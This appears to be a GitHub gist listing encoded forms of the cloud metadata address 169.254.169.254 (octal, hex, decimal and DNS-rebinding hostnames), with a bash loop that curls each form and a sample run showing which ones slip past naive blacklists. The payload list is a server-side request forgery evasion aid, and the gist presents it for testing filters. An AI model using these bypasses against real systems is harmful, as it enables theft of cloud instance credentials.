-
-
Save danielpops/f57aef4f7739ec39eb0aa37cbb92a50f to your computer and use it in GitHub Desktop.
Example of bypasses for naive blacklists of 169.254.169.254 local metadata service. See https://twitter.com/coffeetocode/status/912788650408026112
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ./try_local_metadata.sh | |
| Trying 169.254.169.254... found metadata | |
| Trying 169.254.43518... - | |
| Trying 169.1668966... - | |
| Trying 2852039166... found metadata | |
| Trying 0251.0376.0251.0376... found metadata | |
| Trying 0251.0376.0124776... - | |
| Trying 251.0775248... - | |
| Trying 25177524776... - | |
| Trying 0xa9.0xfe.0xa9.0xfe... found metadata | |
| Trying 0xa9.0xfe.0xa9fe... found metadata | |
| Trying 0xa9.0xfea9fe... found metadata | |
| Trying 0xa9fea9fe... found metadata | |
| Trying metadata.nicob.net... found metadata | |
| Trying 1ynrnhl.xip.io... found metadata | |
| Trying 169.254.169.254.xip.io... found metadata | |
| Trying foo.1ynrnhl.xip.io... found metadata | |
| Trying 425.510.425.510... - | |
| Trying 7147006462... - | |
| Trying 0xA9.0xFE.0xA9.0xFE... found metadata | |
| Trying 0xA9FEA9FE... found metadata | |
| Trying 0x41414141A9FEA9FE... - | |
| Trying 0251.0376.0251.0376... found metadata | |
| Trying 0251.00376.000251.0000376... found metadata | |
| Trying [::1698.254.169.254]... - | |
| Trying instance-data... found metadata |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 169.254.169.254 | |
| 169.254.43518 | |
| 169.1668966 | |
| 2852039166 | |
| 0251.0376.0251.0376 | |
| 0251.0376.0124776 | |
| 251.0775248 | |
| 25177524776 | |
| 0xa9.0xfe.0xa9.0xfe | |
| 0xa9.0xfe.0xa9fe | |
| 0xa9.0xfea9fe | |
| 0xa9fea9fe | |
| metadata.nicob.net | |
| 1ynrnhl.xip.io | |
| 169.254.169.254.xip.io | |
| foo.1ynrnhl.xip.io | |
| 425.510.425.510 | |
| 7147006462 | |
| 0xA9.0xFE.0xA9.0xFE | |
| 0xA9FEA9FE | |
| 0x41414141A9FEA9FE | |
| 0251.0376.0251.0376 | |
| 0251.00376.000251.0000376 | |
| [::1698.254.169.254] | |
| instance-data |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # run on an instance of course... | |
| while read p; do | |
| printf "Trying %-30s " $p... | |
| if curl -s "http://$p/" | grep --silent latest; then | |
| echo found metadata; | |
| else | |
| echo -; | |
| fi | |
| done <local_metadata_synonyms.txt |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment